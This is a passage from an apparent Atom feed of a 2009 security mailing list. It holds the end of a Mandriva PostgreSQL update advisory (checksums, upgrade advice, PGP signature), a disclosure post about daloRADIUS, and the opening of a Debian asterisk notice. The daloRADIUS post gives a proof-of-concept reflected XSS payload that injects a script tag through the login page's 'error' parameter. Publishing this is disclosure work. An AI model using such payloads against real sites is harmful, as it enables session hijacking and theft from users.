&lt;br&gt;&amp;nbsp;877e5894da539e59805469d16dfda370 &amp;nbsp;2009.1/x86_64/postgresql8.3-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;be3ece7cf5ae31d25dc365389b4e8334 &amp;nbsp;2009.1/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;c58f7bf0768b22f5ff229c5cfd4c5f52 &amp;nbsp;2009.1/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;f3252fd034dcf0a47552b78439fccd4a &amp;nbsp;2009.1/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;1b425723f71982812ebf429188cb88da &amp;nbsp;2009.1/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;5b463c7748dcc5fae7b1e7443ee75694 &amp;nbsp;2009.1/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;70d521df18f5fbfffe7073b95a614ff8 &amp;nbsp;2009.1/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;33a607815a4da55a66101fd13062477e &amp;nbsp;2009.1/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;508aae591f0f59aecde2f4212416a45c &amp;nbsp;2009.1/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.x86_64.rpm
&lt;br&gt;&amp;nbsp;8b8f650803166b84ba3a3ff4c538ab89 &amp;nbsp;2009.1/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.1.x86_64.rpm 
&lt;br&gt;&amp;nbsp;be8198d19ff2854fcdb5bde0e1654fbf &amp;nbsp;2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2010.0:
&lt;br&gt;&amp;nbsp;1869824366c51ebb0b55055426bd2c53 &amp;nbsp;2010.0/i586/libecpg8.4_6-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;2bb29a6b0aaa2d556b6c9d5b86a6fac2 &amp;nbsp;2010.0/i586/libpq8.4_5-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;234ea96d6f15028e48fb4d67ba8e3dc0 &amp;nbsp;2010.0/i586/postgresql8.4-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;c044f451d83daa297d1b6bea592c5759 &amp;nbsp;2010.0/i586/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;33167e61bf2e5f8132e581306fb3f9b3 &amp;nbsp;2010.0/i586/postgresql8.4-devel-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;52c063f6a31ef49b87fe70227e1cc7a1 &amp;nbsp;2010.0/i586/postgresql8.4-docs-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;dc75e2ebbab59312d6c1a491b6393f91 &amp;nbsp;2010.0/i586/postgresql8.4-pl-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;a44bac65b39698446f4d066f77cd3085 &amp;nbsp;2010.0/i586/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;9537965ff95b6d6c62be3df17567f6c9 &amp;nbsp;2010.0/i586/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;32b66a3d2d191bf52ad1770ce92a24bd &amp;nbsp;2010.0/i586/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;a45380a8bc2072792ab52042db3a837c &amp;nbsp;2010.0/i586/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.i586.rpm
&lt;br&gt;&amp;nbsp;b99ffb5c3cbb7266b63986b075b0eb95 &amp;nbsp;2010.0/i586/postgresql8.4-server-8.4.2-0.1mdv2010.0.i586.rpm 
&lt;br&gt;&amp;nbsp;7b23c6c695cbf9cf78d105f6bf7fc80f &amp;nbsp;2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux 2010.0/X86_64:
&lt;br&gt;&amp;nbsp;864f7b0ab419b1c08fdbff5af593a9e3 &amp;nbsp;2010.0/x86_64/lib64ecpg8.4_6-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;707a9ed081a46bea0cec38bd2bfe3561 &amp;nbsp;2010.0/x86_64/lib64pq8.4_5-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;e3aa48ed1d6da44aaf791be57619043d &amp;nbsp;2010.0/x86_64/postgresql8.4-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;874e5a9ab5757e0d9c509eee102c0dc2 &amp;nbsp;2010.0/x86_64/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;90627e1bdc5988d3a78ee16491a27148 &amp;nbsp;2010.0/x86_64/postgresql8.4-devel-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;cf905e15179fe18fa68ae02f35713139 &amp;nbsp;2010.0/x86_64/postgresql8.4-docs-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;8e6957a4ca67801131ee70dbe4f3639a &amp;nbsp;2010.0/x86_64/postgresql8.4-pl-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;1b1e5de5c77a30672ea9bba9d49d7bed &amp;nbsp;2010.0/x86_64/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;b87c3d4cd820d21eac3e66559d773508 &amp;nbsp;2010.0/x86_64/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;cfcaf767fb6135169e3fb01704e2831e &amp;nbsp;2010.0/x86_64/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;fd216fa6f5ecb1fa1d8f6429396b4142 &amp;nbsp;2010.0/x86_64/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.x86_64.rpm
&lt;br&gt;&amp;nbsp;9c86fd1c896343e5c48b76aed566f8c8 &amp;nbsp;2010.0/x86_64/postgresql8.4-server-8.4.2-0.1mdv2010.0.x86_64.rpm 
&lt;br&gt;&amp;nbsp;7b23c6c695cbf9cf78d105f6bf7fc80f &amp;nbsp;2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 3.0:
&lt;br&gt;&amp;nbsp;8a71295ef109fe3ab7260170384c0ce7 &amp;nbsp;corporate/3.0/i586/libecpg3-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;11ef4350d665b4b2ef2fd926bd560aa8 &amp;nbsp;corporate/3.0/i586/libecpg3-devel-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;30c8a894b12b223ad491abd4547c1fd7 &amp;nbsp;corporate/3.0/i586/libpgtcl2-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;0fa521cc9af217d927ca79c91b0c9eae &amp;nbsp;corporate/3.0/i586/libpgtcl2-devel-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;3672fefda6db5e828c7d939a27314b38 &amp;nbsp;corporate/3.0/i586/libpq3-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;9a2ba43d5dc9593ca1bbab4647208080 &amp;nbsp;corporate/3.0/i586/libpq3-devel-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;2247db07ed8b627fbfc35ac648c2a5df &amp;nbsp;corporate/3.0/i586/postgresql-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;e616a70f043ff0b0482e87d56a1019cd &amp;nbsp;corporate/3.0/i586/postgresql-contrib-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;08f9f7e7f8fb429cf0c77cfa7eda23d3 &amp;nbsp;corporate/3.0/i586/postgresql-devel-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;6d3b0ed2ba2b362ac09db9c4ae07b9e2 &amp;nbsp;corporate/3.0/i586/postgresql-docs-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;69b5e9674499b805b8e27bb6c348feec &amp;nbsp;corporate/3.0/i586/postgresql-jdbc-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;392426960dd9831613903d460af31b80 &amp;nbsp;corporate/3.0/i586/postgresql-pl-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;c266e60a60a5c438dddd9fc3a9e86415 &amp;nbsp;corporate/3.0/i586/postgresql-server-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;7195e1843ccacf58dd3a8e6888f52687 &amp;nbsp;corporate/3.0/i586/postgresql-tcl-7.4.27-0.1.C30mdk.i586.rpm
&lt;br&gt;&amp;nbsp;d5a7dacb4bbb6d35d0eac00f8fb3fe8f &amp;nbsp;corporate/3.0/i586/postgresql-test-7.4.27-0.1.C30mdk.i586.rpm 
&lt;br&gt;&amp;nbsp;72f69a2d5c5b94cae7b2e9c38c193125 &amp;nbsp;corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 3.0/X86_64:
&lt;br&gt;&amp;nbsp;ca3ea7496d9340c6bc7466e478a821ff &amp;nbsp;corporate/3.0/x86_64/lib64ecpg3-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;0ede7c61f0595bff37777971a2e2d3ac &amp;nbsp;corporate/3.0/x86_64/lib64ecpg3-devel-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;a798bef9e8f689aed42f1317f59fb189 &amp;nbsp;corporate/3.0/x86_64/lib64pgtcl2-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;c5fbbf4818f054ad11be80dad96c2e2f &amp;nbsp;corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;e89bb5fa7f482af3779d4508ccdc0f90 &amp;nbsp;corporate/3.0/x86_64/lib64pq3-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;43966e84c38f69cf644e05f86bb157b9 &amp;nbsp;corporate/3.0/x86_64/lib64pq3-devel-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;7821bd199a8e957f862d2e6751f9993b &amp;nbsp;corporate/3.0/x86_64/postgresql-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;3b7c354b1438fbf7e5613ec4b9525144 &amp;nbsp;corporate/3.0/x86_64/postgresql-contrib-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;1271e5de07e40e7ef5d0b39ad4593cd8 &amp;nbsp;corporate/3.0/x86_64/postgresql-devel-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;17a2e21ba705128bc6dc234fa9222269 &amp;nbsp;corporate/3.0/x86_64/postgresql-docs-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;284c5e6b3bc707509767df7ec5940915 &amp;nbsp;corporate/3.0/x86_64/postgresql-jdbc-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;0b3d675d0991c98ea6b2a665eb587c29 &amp;nbsp;corporate/3.0/x86_64/postgresql-pl-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;742086f186cd02ce6e010aa5b0efcde4 &amp;nbsp;corporate/3.0/x86_64/postgresql-server-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;d5875f42122d0a021b1ae474a3c71de4 &amp;nbsp;corporate/3.0/x86_64/postgresql-tcl-7.4.27-0.1.C30mdk.x86_64.rpm
&lt;br&gt;&amp;nbsp;e4eeed326ce8f6a6cd14d955c9af1c3b &amp;nbsp;corporate/3.0/x86_64/postgresql-test-7.4.27-0.1.C30mdk.x86_64.rpm 
&lt;br&gt;&amp;nbsp;72f69a2d5c5b94cae7b2e9c38c193125 &amp;nbsp;corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 4.0:
&lt;br&gt;&amp;nbsp;f16a9d7c219db91a48f05d47fbb25328 &amp;nbsp;corporate/4.0/i586/libecpg5-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;46e5cba337eb64ebd722f1cf20a1bea0 &amp;nbsp;corporate/4.0/i586/libecpg5-devel-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;aa1bf8fa60ba634f847ef99743b54509 &amp;nbsp;corporate/4.0/i586/libpq4-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;c9b495e705a47e8c657fe486c6a73caa &amp;nbsp;corporate/4.0/i586/libpq4-devel-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;8576e546f41ec07302b09f22b800c2a3 &amp;nbsp;corporate/4.0/i586/postgresql-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;99c18cea6a827b10c4197dea71660714 &amp;nbsp;corporate/4.0/i586/postgresql-contrib-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;7a4ac00898e262a29c945ea24381a02c &amp;nbsp;corporate/4.0/i586/postgresql-devel-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;e10dde94402ce28c56d0a59f449b2120 &amp;nbsp;corporate/4.0/i586/postgresql-docs-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;2b0aaa02c58d5f75be11b93663ac2db2 &amp;nbsp;corporate/4.0/i586/postgresql-pl-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;898ffb6afa67a42abd8cbd415f20f12d &amp;nbsp;corporate/4.0/i586/postgresql-plperl-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;750c34d0bd6c1370a10f65b0fe0d042f &amp;nbsp;corporate/4.0/i586/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;0e2fae96fe4ae65e119ec57bc62d1c18 &amp;nbsp;corporate/4.0/i586/postgresql-plpython-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;ddfb7d5dcb55d11ca58c59072c96ffd8 &amp;nbsp;corporate/4.0/i586/postgresql-pltcl-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;0ff2a52751ddf2c15ab718e378864209 &amp;nbsp;corporate/4.0/i586/postgresql-server-8.1.19-0.1.20060mlcs4.i586.rpm
&lt;br&gt;&amp;nbsp;dbd24a627e161243ace369ed2bd0cb59 &amp;nbsp;corporate/4.0/i586/postgresql-test-8.1.19-0.1.20060mlcs4.i586.rpm 
&lt;br&gt;&amp;nbsp;cd1d017d500f3616eb652ad819dcc8eb &amp;nbsp;corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Corporate 4.0/X86_64:
&lt;br&gt;&amp;nbsp;ff727efb618417699e1d702c463c08ff &amp;nbsp;corporate/4.0/x86_64/lib64ecpg5-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;d9d0a5ed50a5ea130ec32fe942f58c90 &amp;nbsp;corporate/4.0/x86_64/lib64ecpg5-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;64c1ae194c06762d74dc69105a16a6d3 &amp;nbsp;corporate/4.0/x86_64/lib64pq4-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;5ff5e5660fa8e69fdabc2ec56fb41f33 &amp;nbsp;corporate/4.0/x86_64/lib64pq4-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;d92641b17c40ac1237651577a716d716 &amp;nbsp;corporate/4.0/x86_64/postgresql-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;c1a90670f7443af7ae03ddd89fe8ff86 &amp;nbsp;corporate/4.0/x86_64/postgresql-contrib-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;81907fd64a64793480a155ce04b7c8c1 &amp;nbsp;corporate/4.0/x86_64/postgresql-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;a1b78b2902098f4e2981deb47c14705f &amp;nbsp;corporate/4.0/x86_64/postgresql-docs-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;e3ed9cee0ba6f35ba20bcc593059dfc9 &amp;nbsp;corporate/4.0/x86_64/postgresql-pl-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;a4302fcb3ff0a03be6eadc2fa87e7772 &amp;nbsp;corporate/4.0/x86_64/postgresql-plperl-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;81df2078a490b8f7944e14947172a3cb &amp;nbsp;corporate/4.0/x86_64/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;33e8b703accdaf358014a4f4b9f20edf &amp;nbsp;corporate/4.0/x86_64/postgresql-plpython-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;a7d0b24be375bf699a16d856872ed3b0 &amp;nbsp;corporate/4.0/x86_64/postgresql-pltcl-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;124bb9309c4bcb6174703c933e81fdf8 &amp;nbsp;corporate/4.0/x86_64/postgresql-server-8.1.19-0.1.20060mlcs4.x86_64.rpm
&lt;br&gt;&amp;nbsp;a63ab9b6d993eb50e5b437592423dfe7 &amp;nbsp;corporate/4.0/x86_64/postgresql-test-8.1.19-0.1.20060mlcs4.x86_64.rpm 
&lt;br&gt;&amp;nbsp;cd1d017d500f3616eb652ad819dcc8eb &amp;nbsp;corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Enterprise Server 5:
&lt;br&gt;&amp;nbsp;7954b4d7b6b3ad3a4dc075a63503e1d0 &amp;nbsp;mes5/i586/libecpg8.3_6-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;1631a58bfb19765fa166f6e507e9799b &amp;nbsp;mes5/i586/libpq8.3_5-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;643f5cada4cb4dbf53e7931a88be3f33 &amp;nbsp;mes5/i586/postgresql8.3-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;c14326f783c2a1f5b90ea623e00e95bf &amp;nbsp;mes5/i586/postgresql8.3-contrib-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;4e1c3db6f801090ab60b31028fbfaa18 &amp;nbsp;mes5/i586/postgresql8.3-devel-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;c36fcbf4195dbf7becd7c3dabf81e20b &amp;nbsp;mes5/i586/postgresql8.3-docs-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;524d653e230fbac674e9ce464d290b89 &amp;nbsp;mes5/i586/postgresql8.3-pl-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;9877115225ad4463430d7e0bf6debebd &amp;nbsp;mes5/i586/postgresql8.3-plperl-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;9bf0e1591576271129b01f4f0bd60b9e &amp;nbsp;mes5/i586/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;b64538f411412f4025471fcad1ce24c8 &amp;nbsp;mes5/i586/postgresql8.3-plpython-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;3f9499776b4395c5829c761daa952976 &amp;nbsp;mes5/i586/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.i586.rpm
&lt;br&gt;&amp;nbsp;2f8625a2f70355715b426be163316c8c &amp;nbsp;mes5/i586/postgresql8.3-server-8.3.9-0.1mdvmes5.i586.rpm 
&lt;br&gt;&amp;nbsp;a71b64c6243bc5302fd20a09b6f209a7 &amp;nbsp;mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Enterprise Server 5/X86_64:
&lt;br&gt;&amp;nbsp;af91e508191f984255fcca2cc4847dd5 &amp;nbsp;mes5/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;2a9f7ddd1c6b1df8fbaed9f75855d215 &amp;nbsp;mes5/x86_64/lib64pq8.3_5-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;5a99bffb08073b986c113f4e01290acb &amp;nbsp;mes5/x86_64/postgresql8.3-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;34a240a407e23e22fa4fafcacd42aaa4 &amp;nbsp;mes5/x86_64/postgresql8.3-contrib-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;328ffce47393a37b8513ca4db35cfa0e &amp;nbsp;mes5/x86_64/postgresql8.3-devel-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;2813c49a1081e9ba21641ff0221c0282 &amp;nbsp;mes5/x86_64/postgresql8.3-docs-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;ae7edc79dfcbe71b63d3cc63002b999e &amp;nbsp;mes5/x86_64/postgresql8.3-pl-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;b329ee3b0bf6f225d63967194a9ad1f7 &amp;nbsp;mes5/x86_64/postgresql8.3-plperl-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;3357aeaff40947216df472606af69f92 &amp;nbsp;mes5/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;2d1643ae72848a853075a348c3e710b1 &amp;nbsp;mes5/x86_64/postgresql8.3-plpython-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;e190019db4c20a65fbcb6ec71b87fb73 &amp;nbsp;mes5/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.x86_64.rpm
&lt;br&gt;&amp;nbsp;95397048806b12338bf90c216f93f8c6 &amp;nbsp;mes5/x86_64/postgresql8.3-server-8.3.9-0.1mdvmes5.x86_64.rpm 
&lt;br&gt;&amp;nbsp;a71b64c6243bc5302fd20a09b6f209a7 &amp;nbsp;mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;To upgrade automatically use MandrivaUpdate or urpmi. &amp;nbsp;The verification
&lt;br&gt;&amp;nbsp;of md5 checksums and GPG signatures is performed automatically for you.
&lt;br&gt;&lt;br&gt;&amp;nbsp;All packages are signed by Mandriva for security. &amp;nbsp;You can obtain the
&lt;br&gt;&amp;nbsp;GPG public key of the Mandriva Security Team by executing:
&lt;br&gt;&lt;br&gt;&amp;nbsp; gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
&lt;br&gt;&lt;br&gt;&amp;nbsp;You can view other update advisories for Mandriva Linux at:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://www.mandriva.com/security/advisories&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/advisories&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp;If you want to report vulnerabilities, please contact
&lt;br&gt;&lt;br&gt;&amp;nbsp; security_(at)_mandriva.com
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Type Bits/KeyID &amp;nbsp; &amp;nbsp; Date &amp;nbsp; &amp;nbsp; &amp;nbsp; User ID
&lt;br&gt;&amp;nbsp;pub &amp;nbsp;1024D/22458A98 2000-07-10 Mandriva Security Team
&lt;br&gt;&amp;nbsp; &amp;lt;security*mandriva.com&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.9 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFLJ6UdmqjQ0CJFipgRAhI0AKDu7P9IZkttVPb8P6UTShYJa6HLxgCcC6JU
&lt;br&gt;wNWFQRVDjFT4KODLej6slSQ=
&lt;br&gt;=9pvm
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/--MDVSA-2009%3A333---postgresql-tp26799665p26799665.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26797518</id>
	<title>Daloradius XSS Vulnerability</title>
	<published>2009-12-15T05:08:15Z</published>
	<updated>2009-12-15T05:08:15Z</updated>
	<author>
		<name>hadikiamarsi</name>
	</author>
	<content type="html">###########################################
&lt;br&gt;#
&lt;br&gt;# Script Name : daloradius ( All Version ) 
&lt;br&gt;# &amp;nbsp;
&lt;br&gt;# Bug Type : XSS vulnerability
&lt;br&gt;#
&lt;br&gt;# Found by : Hadi Kiamarsi
&lt;br&gt;#
&lt;br&gt;# Contact : hadikiamarsi [at] hotmail.com
&lt;br&gt;#
&lt;br&gt;# Download : &lt;a href=&quot;http://sourceforge.net/projects/daloradius/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sourceforge.net/projects/daloradius/&lt;/a&gt;&lt;br&gt;#
&lt;br&gt;&lt;br&gt;###########################################
&lt;br&gt;&lt;br&gt;PoC :
&lt;br&gt;&lt;br&gt;http://[target]/[path]/daloradius-users/login.php?error=&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;&lt;br&gt;example :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.example.com/daloradius-users/login.php?error=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.example.com/daloradius-users/login.php?error=&lt;/a&gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;&lt;br&gt;local Example :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://localhost/root/daloradius-users/login.php?error=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/root/daloradius-users/login.php?error=&lt;/a&gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Daloradius-XSS-Vulnerability-tp26797518p26797518.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26797080</id>
	<title>[SECURITY] [DSA 1952-2] End-of-life announcement for asterisk in oldstable</title>
	<published>2009-12-15T05:06:34Z</published>
	<updated>2009-12-15T05:06:34Z</updated>
	<author>
		<name>Steffen Joeris-3</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1952-2 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26797080&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
